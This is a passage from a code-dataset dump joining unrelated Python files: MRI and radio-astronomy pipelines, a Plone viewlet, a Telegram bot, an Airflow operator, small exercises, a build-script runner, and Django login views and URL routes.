--acqp=acq_params.txt --bvals=' + str(fbvals) + ' --bvecs=' + str(fbvecs)\n cmd += ' --imain=' + str(fdwi) + ' --index=index.txt --mask='\n if dwif in override_mask:\n cmd += str(override_mask[dwif])\n else:\n cmd += brain_outfname + '_mask.nii'\n cmd += ' --out=' + str(outpath / str(dwif + filterS0_string + '_ec'))\n cmd += ' --repol --ol_sqr --slm=linear --ol_nstd=2 --niter=9 --fwhm=20,5,0,0,0,0,0,0,0'\n cmdt = (cmd,)\n output += cmdt\n output += run_subprocess(cmd)\n dt = datetime.datetime.now()\n output += (str(dt), 'eddy cuda end time for '+str(fdwi))\n params = {}\n params['eddy cmd'] = cmd\n params['eddy output'] = output\n cmd = ''\n output = ()\n dt = datetime.datetime.now()\n output += (str(dt),)\n cmd += 'fslmaths '+ str(outpath / str(dwif + filterS0_string + '_ec'))\n cmd += ' -thr 1 ' + str(outpath / str(dwif + filterS0_string + '_ec_thr1'))\n cmdt = (cmd,)\n output += cmdt\n output += run_subprocess(cmd)\n params['fslmaths clamping cmd'] = cmd\n params['fslmaths output'] = output\n provenance.log(str(outpath / str(dwif + filterS0_string + '_ec_thr1.nii.gz')),\n 'eddy using --repol --ol_sqr --slm=linear --ol_nstd=2 --niter=9 --fwhm=20,5,0,0,0,0,0,0,0',\n str(fdwi), code=__file__, provenance=params)\n","sub_path":"mmimproc/projects/bbc/dwi/eddy.py","file_name":"eddy.py","file_ext":"py","file_size_in_byte":8385,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"524347122","text":"\"\"\"dprepb.py: The DPrepB/C imaging pipeline for SIP.\"\"\"\n\nimport sys\nimport os\n\nos.makedirs('LOGS', exist_ok=True)\nsys.stdout = open('%s/dprepb-log.txt' % ('LOGS'), 'w')\n\nimport numpy as np\n\nimport subprocess\n\nfrom data_models.polarisation import PolarisationFrame\n\nfrom processing_components.imaging.base import create_image_from_visibility, advise_wide_field\nfrom processing_components.image.operations import export_image_to_fits\nfrom processing_components.visibility.operations import append_visibility\nfrom processing_components.image.deconvolution import restore_cube\n\nfrom ska_sip.uvoperations.filter import uv_cut\nfrom ska_sip.uvoperations.convert import convert_to_stokes\nfrom ska_sip.imageoperations.images.imaging import wstack, image_2d\nfrom ska_sip.imageoperations.images.deconvolution import deconvolve_cube_complex\nfrom ska_sip.plotdata.plot import uv_cov, uv_dist\n\nsys.stdout.close()\nsys.stdout = sys.__stdout__\n\n\ndef dprepb_imaging(vis_input):\n \"\"\"The DPrepB/C imaging pipeline for visibility data.\n \n Args:\n vis_input (array): array of ARL visibility data and parameters.\n \n Returns:\n restored: clean image.\n \"\"\"\n # Load the Input Data\n # ------------------------------------------------------\n vis1 = vis_input[0]\n vis2 = vis_input[1]\n channel = vis_input[2]\n stations = vis_input[3]\n lofar_stat_pos = vis_input[4]\n APPLY_IONO = vis_input[5]\n APPLY_BEAM = vis_input[6]\n MAKE_PLOTS = vis_input[7]\n UV_CUTOFF = vis_input[8]\n PIXELS_PER_BEAM = vis_input[9]\n POLDEF = vis_input[10]\n RESULTS_DIR = vis_input[11]\n FORCE_RESOLUTION = vis_input[12]\n ionRM1 = vis_input[13]\n times1 = vis_input[14]\n time_indices1 = vis_input[15]\n ionRM2 = vis_input[16]\n times2 = vis_input[17]\n time_indices2 = vis_input[18]\n twod_imaging = vis_input[19]\n npixel_advice = vis_input[20]\n cell_advice = vis_input[21]\n \n # Make a results directory on the worker:\n os.makedirs(RESULTS_DIR, exist_ok=True)\n \n # Redirect stdout, as Dask cannot print on workers\n # ------------------------------------------------------\n 
sys.stdout = open('%s/dask-log.txt' % (RESULTS_DIR), 'w')\n \n # Prepare Measurement Set\n # ------------------------------------------------------\n # Combine MSSS snapshots:\n vis = append_visibility(vis1, vis2)\n \n # Apply a uv-distance cut to the data:\n vis = uv_cut(vis, UV_CUTOFF)\n \n # Make some basic plots:\n if MAKE_PLOTS:\n uv_cov(vis)\n uv_dist(vis)\n\n # Imaging and Deconvolution\n # ------------------------------------------------------\n # Convert from XX/XY/YX/YY to I/Q/U/V:\n vis = convert_to_stokes(vis, POLDEF)\n\n # Image I, Q, U, V, per channel:\n if twod_imaging:\n dirty, psf = image_2d(vis, npixel_advice, cell_advice, channel, RESULTS_DIR)\n else:\n dirty, psf = wstack(vis, npixel_advice, cell_advice, channel, RESULTS_DIR)\n\n # Deconvolve (using complex Hogbom clean):\n comp, residual = deconvolve_cube_complex(dirty, psf, niter=100, threshold=0.001, \\\n fracthresh=0.001, window_shape='', gain=0.1, \\\n algorithm='hogbom-complex')\n\n # Convert resolution (FWHM in arcmin) to a psfwidth (standard deviation in pixels):\n clean_res = (((FORCE_RESOLUTION/2.35482004503)/60.0)*np.pi/180.0)/cell_advice\n\n # Create the restored image:\n restored = restore_cube(comp, psf, residual, psfwidth=clean_res)\n\n # Save to disk:\n export_image_to_fits(restored, '%s/imaging_clean_WStack-%s.fits'\n % (RESULTS_DIR, channel))\n\n return restored\n\n\ndef arl_data_future(restored):\n \"\"\"Return the data from an ARL object.\n \n Args:\n restored (ARL object): ARL image data.\n \n Returns:\n restored.data: clean image.\n \"\"\"\n \n return restored.data\n","sub_path":"DPrepB-C/ska_sip/pipelines/dprepb.py","file_name":"dprepb.py","file_ext":"py","file_size_in_byte":3919,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"556955150","text":"from Acquisition import aq_chain\nfrom opengever.base.browser.helper import get_css_class\nfrom opengever.base.interfaces import ISQLObjectWrapper\nfrom opengever.ogds.base.utils import get_current_admin_unit\nfrom opengever.ogds.models.service import ogds_service\nfrom opengever.repository.interfaces import IRepositoryFolder\nfrom opengever.repository.repositoryroot import IRepositoryRoot\nfrom plone.app.layout.navigation.interfaces import INavigationRoot\nfrom plone.app.layout.viewlets import common\nfrom Products.CMFPlone.interfaces import IHideFromBreadcrumbs\nfrom Products.Five.browser.pagetemplatefile import ViewPageTemplateFile\n\n\nclass PathBar(common.PathBarViewlet):\n \"\"\"The breadcrumb viewlet.\n\n Unlike the plone default pathbar viewlet it groups all repository paths in\n to a dropdown list and shows the content icon for each crumb.\n \"\"\"\n\n index = ViewPageTemplateFile('pathbar.pt')\n\n leaf_node = None\n repository_chain = None\n obj_chain = None\n\n def admin_unit_label(self):\n return get_current_admin_unit().label()\n\n def update(self):\n repository_items, self.obj_chain = self.get_chains()\n\n if repository_items:\n self.leaf_node = repository_items[0]\n if len(repository_items) > 1:\n self.repository_chain = repository_items[1:]\n\n def is_part_of_repo(self, obj):\n return IRepositoryRoot.providedBy(obj) or \\\n IRepositoryFolder.providedBy(obj)\n\n def get_chains(self):\n repository = []\n chain = []\n for obj in aq_chain(self.context):\n if INavigationRoot.providedBy(obj):\n break\n\n if IHideFromBreadcrumbs.providedBy(obj):\n continue\n\n if ISQLObjectWrapper.providedBy(obj):\n data = obj.get_breadcrumb()\n else:\n data = {\n 'absolute_url': obj.absolute_url(),\n 
'title': obj.Title(),\n                    'css_class': get_css_class(obj, type_icon_only=True)\n                }\n\n            if self.is_part_of_repo(obj):\n                repository.append(data)\n            else:\n                chain.append(data)\n\n        chain.reverse()\n\n        return repository, chain\n\n    def has_multiple_admin_units(self):\n        return ogds_service().has_multiple_admin_units()\n","sub_path":"opengever/base/viewlets/pathbar.py","file_name":"pathbar.py","file_ext":"py","file_size_in_byte":2341,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"598380091","text":"from aiogram.dispatcher import FSMContext\r\nfrom aiogram.dispatcher.filters import Command, CommandStart\r\nfrom aiogram import types\r\nfrom aiogram.types import ReplyKeyboardRemove\r\nfrom keyboards.default import user_keyboard\r\nfrom loader import dp, db\r\n\r\n\r\n# handler for the command that adds an e-mail address\r\n@dp.message_handler(Command(\"mail\"))\r\nasync def update_email(message: types.Message, state: FSMContext):\r\n    await message.answer(\"Send me the e-mail address I can use to send you files and notifications.\",\r\n                         reply_markup=user_keyboard.keyboard)\r\n    await state.set_state(\"mail\")\r\n\r\n\r\n# save the e-mail address to the DB\r\n@dp.message_handler(state=\"mail\")\r\nasync def enter_email(message: types.Message, state: FSMContext):\r\n    mail = message.text\r\n\r\n    import re\r\n    if re.match(r\"^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\\.[a-zA-Z0-9-.]+$\", mail):\r\n        db.update_user_email(email=mail, id=message.from_user.id)\r\n        await message.answer(f\"The e-mail address has been saved to your profile.\", reply_markup=ReplyKeyboardRemove())\r\n        await state.finish()\r\n    else:\r\n        await message.reply(text=f\"The e-mail address is invalid. Please try again.\",\r\n                            reply_markup=user_keyboard.keyboard)\r\n\r\n\r\n# handler for the command that adds a group number\r\n@dp.message_handler(CommandStart(deep_link=\"number_party\"))\r\n@dp.message_handler(Command(\"party\"))\r\nasync def update_party(message: types.Message, state: FSMContext):\r\n    await message.answer(\"Send me your group number\", reply_markup=user_keyboard.keyboard)\r\n    await state.set_state(\"number_party\")\r\n\r\n\r\n# save the group number to the DB\r\n@dp.message_handler(state=\"number_party\")\r\nasync def enter_party(message: types.Message, state: FSMContext):\r\n    number_party = message.text\r\n    if number_party in ['101', '102', '103', '104', '105']:\r\n        db.update_number_party(number_party=number_party, id=message.from_user.id)\r\n        user = db.select_user(id=message.from_user.id)\r\n        await message.answer(f\"Data updated. DB record: {user}\", reply_markup=ReplyKeyboardRemove())\r\n        await state.finish()\r\n    else:\r\n        await message.reply(text=f\"That group does not exist; enter the group again or press the cancel button\",\r\n                            reply_markup=user_keyboard.keyboard)\r\n","sub_path":"handlers/users/db_mode/database_commands.py","file_name":"database_commands.py","file_ext":"py","file_size_in_byte":2643,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"343979044","text":"from airflow.hooks.postgres_hook import PostgresHook\nfrom airflow.models import BaseOperator\nfrom airflow.utils.decorators import apply_defaults\n\nclass DataQualityOperator(BaseOperator):\n    \"\"\"\n    Operator to perform validation of the results of a Data Pipeline.\n    \n    :param redshift_conn_id: Airflow connection id to Redshift configuration (default '')\n    :param table: Target Redshift table to validate (default '')\n    :param test_sql: SQL to retrieve the data to be validated. 
Supports Airflow Macros templating (default '')\n    :param result_checker: Lambda callback function to check if the result is valid. If False is returned, the operator will raise a ValueError (default 'lambda x: True')\n    \"\"\"\n    ui_color = '#89DA59'\n    template_fields = (\"test_sql\",)\n\n    @apply_defaults\n    def __init__(self,\n                 redshift_conn_id = \"\",\n                 table=\"\",\n                 test_sql=\"\",\n                 result_checker=(lambda x: True),\n                 *args, **kwargs):\n\n        super(DataQualityOperator, self).__init__(*args, **kwargs)\n        self.redshift_conn_id = redshift_conn_id\n        self.table = table\n        self.test_sql = test_sql\n        self.result_checker = result_checker\n\n    def execute(self, context):\n        self.log.info(f\"Started data quality verification on Redshift table ({self.table})\")\n        sql = self.test_sql.format(**context)\n        redshift_hook = PostgresHook(self.redshift_conn_id)\n        result = redshift_hook.get_records(sql)\n        if self.result_checker(result[0][0]) == False:\n            raise ValueError(f\"Data quality check failed against {self.table}.\")\n\n        self.log.info(f\"Completed data quality verification on Redshift table ({self.table}) successfully\")","sub_path":"plugins/operators/data_quality.py","file_name":"data_quality.py","file_ext":"py","file_size_in_byte":1742,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"263490651","text":"'''\r\nYou are climbing a stair case. It takes n steps to reach to the top.\r\n\r\nEach time you can either climb 1 or 2 steps. In how many distinct ways can you climb to the top?\r\n\r\nInput: 3\r\nOutput: 3\r\nExplanation: There are three ways to climb to the top.\r\n1. 1 step + 1 step + 1 step\r\n2. 1 step + 2 steps\r\n3. 2 steps + 1 step\r\n'''\r\n\r\nclass Solution:\r\n\tdef climbStairs(self, n:int)->int:\r\n\t\t#implement fibonacci sequence\r\n\t\tif n == 1:\r\n\t\t\treturn 1\r\n\t\telif n == 2:\r\n\t\t\treturn 2\r\n\t\telse:\r\n\t\t\treturn self.climbStairs(n-1)+self.climbStairs(n-2)\r\n\r\n\r\n\r\ndef main():\r\n\tsol = Solution()\r\n\toutput = sol.climbStairs(35)\r\n\tprint(output)\r\n\r\nif __name__ == \"__main__\":\r\n\tmain()\r\n\r\n","sub_path":"70_climbStairs.py","file_name":"70_climbStairs.py","file_ext":"py","file_size_in_byte":665,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"531203879","text":"import os\r\nfrom django.shortcuts import render, redirect\r\nfrom .forms import LoginForm, ImageForm\r\nfrom .models import VssImage, ShareServerImage, ShareUserImage, ResultImage\r\nfrom django.views.generic import TemplateView\r\nfrom django.contrib.auth.views import LoginView, LogoutView\r\nfrom django.contrib.auth.mixins import LoginRequiredMixin, UserPassesTestMixin\r\nfrom django.conf import settings\r\n\r\nfrom django.http import HttpResponseRedirect\r\nfrom django.contrib.auth import login as auth_login, logout as auth_logout\r\nfrom django.utils.decorators import method_decorator\r\nfrom django.views.decorators.cache import never_cache\r\n\r\nfrom .vss import CreateVss, CheckVss\r\n\r\n# Create your views here.\r\n\r\nclass MyLogoutView(LogoutView):\r\n    @method_decorator(never_cache)\r\n    def dispatch(self, request, *args, **kwargs):\r\n        # logout\r\n        self.request.user.verification = False\r\n        self.request.user.save()\r\n        auth_logout(request)\r\n        next_page = self.get_next_page()\r\n        if next_page:\r\n            # Redirect to this page until the session has been cleared.\r\n            return HttpResponseRedirect(next_page)\r\n        return super().dispatch(request, *args, **kwargs)\r\n\r\n\r\nclass 
VerificationTestMixin(UserPassesTestMixin):\r\n raise_exception = False\r\n\r\n def test_func(self):\r\n if self.request.user.is_verification():\r\n print('Authenticated')\r\n return True\r\n auth_logout(self.request)\r\n\r\n return False \r\n\r\n\r\nclass Login(LoginView):\r\n form_class = LoginForm\r\n template_name = 'users/login.html'\r\n\r\n def form_valid(self, form):\r\n \"\"\"Security check complete. Log the user in.\"\"\"\r\n auth_login(self.request, form.get_user())\r\n return HttpResponseRedirect(self.get_success_url())\r\n\r\n\r\nclass Logout(LoginRequiredMixin, MyLogoutView):\r\n template_name = 'users/logout.html'\r\n\r\n\r\nclass Verification(LoginRequiredMixin, TemplateView):\r\n def get(self, request):\r\n username = request.user.username\r\n\r\n # Select original image\r\n selected_vss = 1\r\n original = VssImage.objects.get(id=selected_vss)\r\n\r\n # Create vss share\r\n vss = CreateVss(settings.BASE_DIR+original.image.url)\r\n share_server_url = settings.BASE_DIR+'/media/share/server/'+username+'.png'\r\n share_user_url = settings.BASE_DIR+'/media/share/user/'+username+'.png'\r\n result_url = settings.BASE_DIR+'/media/result/'+username+'.png'\r\n vss.save_vss(share_server_url, share_user_url)\r\n vss.save_result(result_url)\r\n\r\n # Register vss share in the DB\r\n if ShareServerImage.objects.filter(username=username).exists():\r\n ShareServerImage.objects.get(username=username).delete()\r\n if ResultImage.objects.filter(username=username).exists():\r\n ResultImage.objects.get(username=username).delete()\r\n ShareServerImage.objects.create(username=username, image=share_server_url)\r\n ResultImage.objects.create(username=username, image=result_url)\r\n\r\n params = {\r\n 'form' : ImageForm(initial={ 'username' : username }),\r\n }\r\n\r\n #os.remove(share_user_url)\r\n\r\n #print(Verification.mro())\r\n\r\n return render(request, 'users/verification.html', params)\r\n\r\n def post(self, request):\r\n username = request.user.username\r\n \r\n share = ImageForm(request.POST, request.FILES)\r\n if ShareUserImage.objects.filter(username=username).exists():\r\n ShareUserImage.objects.get(username=username).delete()\r\n share.save()\r\n\r\n result_url = str(ResultImage.objects.get(username=username).image)\r\n share1_url = str(ShareServerImage.objects.get(username=username).image)\r\n share2_url = settings.BASE_DIR+'/media/'+str(ShareUserImage.objects.get(username=username).image)\r\n vss = CheckVss(result_url, share1_url, share2_url)\r\n\r\n if vss.test():\r\n self.request.user.verification = True\r\n self.request.user.save()\r\n return redirect(to='/comic')\r\n\r\n return redirect(to='users:logout')\r\n","sub_path":"users/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4103,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"534746104","text":"\"\"\"\r\nQuestion 87 :\r\n With two given lists [1,3,6,8,35,55] and [12,24,35,24,88,120,155]\r\n write a program to make a list whose elements are intersection\r\n of the above lists.\r\n\r\n Hints : Use set() and \"&=\" to do set intersection operation.\r\n\"\"\"\r\n\r\n# Solution :\r\nfrom typing import Set\r\n\r\nset1 = set([1, 3, 6, 8, 35, 55])\r\nset2 = set([12, 24, 35, 24, 88, 120, 155])\r\n\r\nset1 &= set2\r\nli = list(set1)\r\nprint(li)\r\n\r\n\"\"\"\r\nOutput : \r\n 
[35]\r\n\"\"\"","sub_path":"Question-87.py","file_name":"Question-87.py","file_ext":"py","file_size_in_byte":452,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"136779990","text":"#import subprocess\nimport os\n\nwith open(\"ios-ads.txt\") as textfile1, open(\"android-ads.txt\") as textfile2, open(\"appNames.txt\") as textfile3, open(\"branches.txt\") as textfile4, open(\"bundle-ids.txt\") as textfile5, open(\"prevAppNames.txt\") as textfile6:\n    for x, y, z, b, bun, prev in zip(textfile1, textfile2, textfile3, textfile4, textfile5, textfile6):\n        x = x.strip()\n        y = y.strip()\n        z = z.strip()\n        b = b.strip()\n        bun = bun.strip()\n        prev = prev.strip()\n        \n        cmd0 = \"echo value: \" + x + \" \" + y + \" \" + z + \" \" + b + \" \" + bun + \" \" + prev\n        cmd = \"bash iosAutomationScript.sh \" + x + \" \" + y + \" \" + z + \" \" + b + \" \" + bun + \" \" + prev\n        os.system(cmd0)\n        os.system(cmd)\n","sub_path":"ios-automation/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":747,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"85910461","text":"from sikuli import *\nimport sys, os\nfrom datetime import *\nimport java.lang.System\n\nimport images as img\n\nopsys = java.lang.System.getProperty('os.name')\n \n## Current utilities path; contains util and testing_util, and pretty much\n## everything else.\n\nframework_path = os.path.expanduser(\"~\") + \"/source_code/tools_dev/sikuli_testing\" \n\nif not framework_path in sys.path:\n    sys.path.append(framework_path)\n\n## Path where the test jsons go. Defaults to just framework_path/TESTS/.\nTESTS_path = framework_path + \"/TESTS/\"\n\n## Paths for logging.\nsuite_TS = datetime.now() # CHANGE THIS.\nlog_folder = framework_path + \"/log/\"\nlog_file = log_folder + \"log.csv\"\n\n## Image and button dictionaries.\ndef make_imgDict(imglist, key_value = 0):\n    \"\"\"Given a list of images in json format {#0:#1, ...}, create a dict callable by value 0 or 1.\"\"\" \n    \n    I = {}\n    for name_img in imglist: I[name_img[key_value]] = name_img[(not key_value) & 1]\n    return I\n\nimgDict = make_imgDict(img.image_list()) # Search by screen name (eg, \"memo_screen\").\nscreenDict = make_imgDict(img.image_list(), key_value = 1) # Search by screen image (eg, \"memo_screen.jpeg\"). 
\nbuttonDict = img.button_list()\nmiscimgDict = img.misc_images()\n\n ","sub_path":"globals.sikuli/globals.py","file_name":"globals.py","file_ext":"py","file_size_in_byte":1230,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"338227037","text":"# -*- coding: utf-8 -*-\nfrom django.conf.urls import patterns, include, url\nfrom django.core.cache import cache\n\n# Uncomment the next two lines to enable the admin:\nfrom django.contrib import admin\nadmin.autodiscover()\n\nfrom kinger import settings\nfrom kinger.forms import KSignupForm, KChangeEmailForm, KEditProfileForm, KAuthenticationForm\n\n\n# handler404 = \"kinger.views.errors.handler404\"\nhandler500 = \"kinger.views.errors.handler500\"\n\nurlpatterns = patterns(\"kinger.views.frontend\",\n url('^index/$', \"index\", name=\"home\"),\n url('^cal/$', \"cal\", name=\"kinger_cal\"),\n# url('^axis/$', \"time_axis\", name=\"kinger_time_axis\"),\n# url('^test/$', \"test\", name=\"kinger_test\"),\n url(r'^pre/$', \"index\", name='home'),\n url('^tile/(?P\\d+)/$', \"view\", name='tile_view'),\n url('^tile/comment/(?P\\d+)/delete/$', \"delete_comment\", name='tile_delete_comment'),\n url(r'^get_user_info/$', \"get_user_info\", name=\"kinger_get_user_info\"), \n url(r'^vcar/$', \"vcar\", name=\"kinger_vcar\"),\n url(r'^unread_list/$', \"unread_list\", name=\"kinger_unread_list\"),\n url(r'^daily_record/$', \"daily_record\", name=\"kinger_daily_record\"),\n url(r'^daily_activity/(?P\\d+)/$', \"daily_activity\", name=\"kinger_daily_activity\"),\n url(r'^daily_cookbook/(?P\\d+)/$', \"daily_cookbook\", name=\"kinger_daily_cookbook\"),\n url(r'^daily_date/$', \"get_daily_by_date\", name=\"get_daily_by_date\"),\n url(r'^mark_cookbook_as_read/$', \"mark_cookbook_as_read\", name=\"kinger_mark_cookbook_as_read\"),\n url(r'^introduction/$', \"introduction\", name=\"kinger_introduction\"),\n)\n\nurlpatterns += patterns(\"kinger.views.revision\",\n url(r'^rev/$', \"edu_index\", name=\"kinger_edu_index\"),\n url(r'^$', \"edu_index\", name=\"kinger_edu_index\"),\n url('^rev/edu/$', \"life_edu\", name=\"kinger_life_edu_index\"),\n url('^rev/baby/$', \"baby_index\", name=\"kinger_baby_index\"),\n url('^rev/cal/$', \"cal\", name=\"kinger_rev_cal\"),\n url('^rev/axis/$', \"time_axis\", name=\"kinger_rev_time_axis\"),\n url('^rev/commentshow/(?P\\d+)/$', 'show_comment', name='kinger_rev_showcomment'),\n url('^rev/axis_effective_date/$', \"axis_effective_date\", name=\"kinger_rev_axis_effective_date\"),\n \n \n \n# url('^rev/test/$', \"test\", name=\"kinger_test\"),\n# url(r'^rev/$', \"edu_index\", name='home'),\n url('^rev/tile/(?P\\d+)/$', \"view\", name='rev_tile_view'),\n url('^rev/tile/comment/(?P\\d+)/delete/$', \"delete_comment\", name='rev_tile_delete_comment'),\n url(r'^rev/get_user_info/$', \"get_user_info\", name=\"kinger_rev_get_user_info\"), \n url(r'^rev/vcar/$', \"vcar\", name=\"kinger_rev_vcar\"),\n url(r'^rev/unread_list/$', \"unread_list\", name=\"kinger_rev_unread_list\"),\n url(r'^rev/daily_record/$', \"daily_record\", name=\"kinger_rev_daily_record\"),\n url(r'^rev/daily_activity/(?P\\d+)/$', \"daily_activity\", name=\"kinger_rev_daily_activity\"),\n url(r'^rev/daily_cookbook/(?P\\d+)/$', \"daily_cookbook\", name=\"kinger_rev_daily_cookbook\"),\n url(r'^rev/daily_date/$', \"get_daily_by_date\", name=\"rev_get_daily_by_date\"),\n url(r'^rev/mark_cookbook_as_read/$', \"mark_cookbook_as_read\", name=\"kinger_rev_mark_cookbook_as_read\"),\n url(r'^rev/introduction/$', \"introduction\", 
name=\"kinger_rev_introduction\"),\n)\n\nurlpatterns += patterns(\"kinger.views.axis\",\n    url('^axis/$', \"time_axis\", name=\"kinger_time_axis\"),\n    url('^axis/get_daily_baby_tiles/$', \"get_daily_baby_tiles\", name=\"kinger_axis_daily_baby_tiles\"),\n    url('^axis/(?P\\d+)/$', \"tile_view\", name='axis_tile_view'),\n    url('^axis_pre/(?P\\d+)/$', \"tile_view_pre\", name='axis_tile_view_pre'),\n    \n    url('^axis/tile_page/(?P\\d+)/$', \"tile_page\", name='axis_tile_page'),\n    url('^axis/more_comment/(?P\\d+)/$', \"more_comment\", name='axis_more_comment'),\n    url(r'^axis/daily_record/$', \"daily_record\", name=\"kinger_axis_daily_record\"),\n    url(r'^axis/daily_activity/$', \"daily_activity\", name=\"kinger_axis_daily_activity\"),\n    url(r'^axis/daily_cookbook/$', \"daily_cookbook\", name=\"kinger_axis_daily_cookbook\"),\n    url('^axis/create_baby_tile/$', \"create_baby_tile\", name=\"kinger_rev_create_baby_tile\"),\n    url('^axis/tile/n_comments/$', \"get_tile_n_comments\", name=\"axis_get_tile_n_comments\"),\n    url('^axis/tile/delete/(?P\\d+)/$', \"delete_tile\", name=\"axis_delete_tile\"),\n    url('^axis/tile/description/$', \"edit_tile_description\", name=\"axis_edit_tile_description\"),\n    url('^rev/theme/$', \"theme_view\", name=\"kinger_rev_theme_view\"),\n)\n\n \n# Password recovery URLs\nurlpatterns += patterns(\"kinger.views.account\",\n    url(r'^accounts/pwd_back_mail/$', \"pwd_back_mail\", name=\"kinger_pwd_back_mail\"),\n    url(r'^accounts/pwd_back_mail_done/$', \"pwd_back_mail_done\", name=\"kinger_pwd_back_mail_done\"),\n    url(r'^accounts/pwd_back_mail_reset/(?P[0-9A-Za-z]+)-(?P.+)/$',\n        'pwd_back_mail_reset',\n        name='kinger_pwd_back_mail_reset'),\n\n\n    url(r'^accounts/pwd_back_mobile/$', \"pwd_back_mobile\", name=\"kinger_pwd_back_mobile\"),\n    url(r'^accounts/pwd_back_mobile_get_vcode/$', \"pwd_back_mobile_get_vcode\", name=\"kinger_pwd_back_mobile_get_vcode\"),\n\n    url(r'^accounts/pwd_back_pwd_reset/$', \"pwd_back_pwd_reset\", name=\"kinger_pwd_back_pwd_reset\"),\n    url(r'^accounts/pwd_back_success/$', \"pwd_back_success\", name=\"kinger_pwd_back_success\"), \n)\n\nurlpatterns += patterns(\"kinger.views.cross_domain\",\n    url(r'^cross_domain/login/$', \"cross_domain_login\", name='cross_domain_login'),\n    url(r'^cross_domain/logout/$', \"cross_domain_logout\", name='cross_domain_logout'),\n)\n\nurlpatterns += patterns(\"kinger.views.admin.advimage\",\n    url(r'^upload_image/$', \"upload_image\", name=\"upload_image\"),\n    url(r'^upload_tile_image/$', \"upload_tile_image\", name=\"upload_tile_image\"),\n)\n\nurlpatterns += patterns(\"kinger.views.statistical.weixiao\",\n    url(r'^statistical/$', \"index\", name=\"statistical_index\"), \n    url(r'^statistical/group_teacher/$', \"group_teacher\", name=\"statistical_group_teacher\"),\n    url(r'^statistical/school_group/$', \"school_group\", name=\"statistical_school_group\"),\n    url(r'^statistical/school_student/$', \"school_student\", name=\"statistical_school_student\"),\n    url(r'^statistical/tile_visit/$', \"student_tile_visit\", name=\"statistical_tile_visit\"),\n    url(r'^statistical/page_request_time/$', \"page_request_time\", name=\"statistical_page_request_time\"),\n)\n\nurlpatterns += patterns(\"kinger.views.ykauth\",\n    url(r'^YKAuth.txt/$', \"index\", name=\"ykauth\"),\n)\n\nurlpatterns += patterns('',\n    \n    url(r'^admin/', include('kinger.views.admin.urls')),\n    url(r'^admin/', include(admin.site.urls)),\n    (r'^grappelli/', include('grappelli.urls')),\n    # # Edit profile\n    url(r'^accounts/(?P<username>[\\.\\w]+)/edit/$',\n        \"userena.views.profile_edit\", {'edit_profile_form': 
KEditProfileForm},\n        name='userena_profile_edit'),\n    url(r'^account_setting/$', 'userena.views.account_setting', name=\"userena_account_setting\"),\n    url(r'^accounts/signup/$',\n        \"userena.views.signup\", {'signup_form': KSignupForm},\n        name='userena_signup'),\n    # Change email and confirm it\n    url(r'^accounts/(?P<username>[\\.\\w]+)/email/$',\n        \"userena.views.email_change\", {\"email_form\": KChangeEmailForm},\n        name='userena_email_change'),\n    url(r'^accounts/signin/$',\n        \"userena.views.signin\", {\"auth_form\": KAuthenticationForm},\n        name='userena_signin'),\n    (r'^accounts/', include('userena.urls')),\n    (r'^comments/', include('django.contrib.comments.urls')),\n    (r'^manage/', include('manage.urls')),\n\n    # Expert Q&A\n    (r'^aq/', include('aq.urls')),\n\n    # Customer service Q&A\n    (r'^waiter/', include('waiter.urls')),\n\n    # SMS related\n    (r'^sms/', include('sms.urls')),\n    \n    #oa\n    (r'^oa/', include('oa.urls')),\n    (r'^supply/', include('oa.supply.urls')),\n#    (r'^oa/site/', include('oa.views.site.urls')),\n\n    (r'^growth/', include('kinger.growth.urls')),\n    # On-site notifications\n    ('^notification/', include('notifications.urls',namespace='notifications')),\n\n    (r'^photologue/', include('photologue.urls')),\n    url(r'^like/', include('likeable.urls')),\n\n\n    #(r'^messages/', include('userena.contrib.umessages.urls')),\n\n    #url(r'^message/(?P\\d+)/delete/$', \"kinger.views.message.message_delete\", name='userena_umessages_delete'),\n\n    (r'^client/', include('kinger.apps.client.urls')),\n    (r'^oauth2/', include('kinger.apps.oauth2.urls')),\n    (r'^api/v1/', include('api.urls',app_name='api')),\n    (r'^api/v2/', include('apiv2.urls',app_name='apiv2')),\n\n    (r'^backend/', include('backend.urls')),\n\n    (r'^favicon\\.ico$', 'django.views.generic.simple.redirect_to', {'url': '/_static/img/favicon.ico'}),\n\n)\n\nurlpatterns += patterns(\"kinger.views.message\",\n    url(r'^messages/$',\n        \"message_list\",\n        name='userena_umessages_list'),\n    \n    url(r'^message/history/(?P\\d+)/$',\n        \"user_message_history\",\n        name='user_umessages_history'),\n    \n    url(r'^message/history/(?P[\\.\\w]+)/$',\n        \"message_history\",\n        name='userena_umessages_history'),\n    \n    url(r'^message/quick_contact/$',\n        \"message_quick_contact\",\n        name='userena_umessages_quick_contact'),\n\n    url(r'^message/remove/$',\n        \"message_remove\",\n        name='userena_umessages_remove'),\n\n    url(r'^message/contact_remove/(?P[\\.\\w]+)$',\n        \"contact_remove\",\n        name='userena_umessages_contact_remove'),\n)\n\nurlpatterns += patterns('',\n    url(r'^captcha/', include('captcha.urls')),\n)\n\nurlpatterns += patterns('kinger.views.test',\n    url(r'^tests/', 'test'),\n)\n\nurlpatterns += patterns('',\n    url(r'^site_file/(?P<path>.*)$','django.views.static.serve',{'document_root':settings.FILE_PATH}),\n)\n\nurlpatterns += patterns('',\n    # media directory\n    url(r'^%s(?P<path>.*)$' % settings.MEDIA_URL[1:],\n        'django.views.static.serve', {\"document_root\": settings.MEDIA_ROOT}),\n)\n\nurlpatterns += patterns('',\n    # static directory\n    url(r'^%s(?P<path>.*)$' % 